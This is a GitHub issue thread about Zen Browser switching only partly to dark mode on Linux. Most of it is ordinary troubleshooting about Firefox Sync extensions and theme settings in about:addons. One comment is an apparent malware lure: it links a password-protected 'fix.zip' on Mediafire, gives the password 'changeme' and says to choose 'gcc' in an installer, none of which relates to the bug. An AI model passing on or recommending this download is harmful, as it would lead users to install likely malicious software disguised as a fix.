### ISSUE TITLE
Swithing to Dark mode

### ISSUE THREAD

**Issue by SanjayBalaji** [zen-browser/desktop#755]
### What happened?

I am using Debian 12. While setting up the browser after installation, I have chosen to go with light mode. Later when I wanted to switch to dark mode, only part of the browser is switching to dark mode - The address bar, bookmark toolbar, the toolbar where tabs are there, are still in light mode. This look is very inconsistent.
Steps to Reproduce:
    Install the application
    Choose light mode
    Go to settings -> General -> Dark Mode

![Screenshot from 2024-08-26 13-09-19](https://github.com/user-attachments/assets/e7d1aac8-d3ca-48b3-903b-5d46abcf90a1)

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

v1.0.0-a.29

### Severity impact

Low

### What platform are you seeing the problem on?

Linux

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vicvancooten** [comment]
I encountered the same, but figured out it was due to Firefox Sync installing an old extension that caused this. After removing the extension, I could switch modes again. It's worth a check.

**Comment by SanjayBalaji** [comment]
While creating this issue, I was not logged in to Firefox Sync. After reading this comment, when I logged in, the issue was resolved. Should the issue be closed? (Asking since this can be encountered by future users as well)

**Comment by IAmJafeth** [comment]
Hi @SanjayBalaji,

Please go to `about:addons` and select one of the Zen's Light Themes: 
- Light
- Zen Dream

This will modify the Browser colors to match your light theme

![image](https://github.com/user-attachments/assets/36b12f79-b339-43b5-a655-7476f78527d6)

I will be closing this issue for the moment, let me know if this does not resolves your issue.

**Comment by jsmollin** [comment]
@IAmJafeth Your solution is hacky. When choosing automatic, light, or dark for the Zen Browser theme, the application should switch themes (e.g., borders and all). I love the potential for your new browser and theming just works in far inferior programs.

**Comment by vicvancooten** [comment]
> @IAmJafeth Your solution is hacky. When choosing automatic, light, or dark for the Zen Browser theme, the application should switch themes (e.g., borders and all). I love the potential for your new browser and theming just works in far inferior programs.

Yeah I agree. Currently it's quite confusing that both Firefox themes and Zen Mods can theme a browser. This should be one concept. Of course it would be great to support all firefox themes available in the store, I don't think it offers any clear benefits, and it can confuse users. I believe Zen should offer one set, which is most likely Zen Mods and a set of settings for theme customization.

**Comment by Andrewblasco** [comment]
I'm using Linux Mint, and I has the same error.
Other apps (and even Firefox) switch between white and dark themes seamlessly.
But not Zen (version 1.12.3b, Firefox 138.0.1).

**Comment by dbittencourt** [comment]
I have the same issue, and I can't even see themes in the add-ons page (I installed a dark theme to test it ).
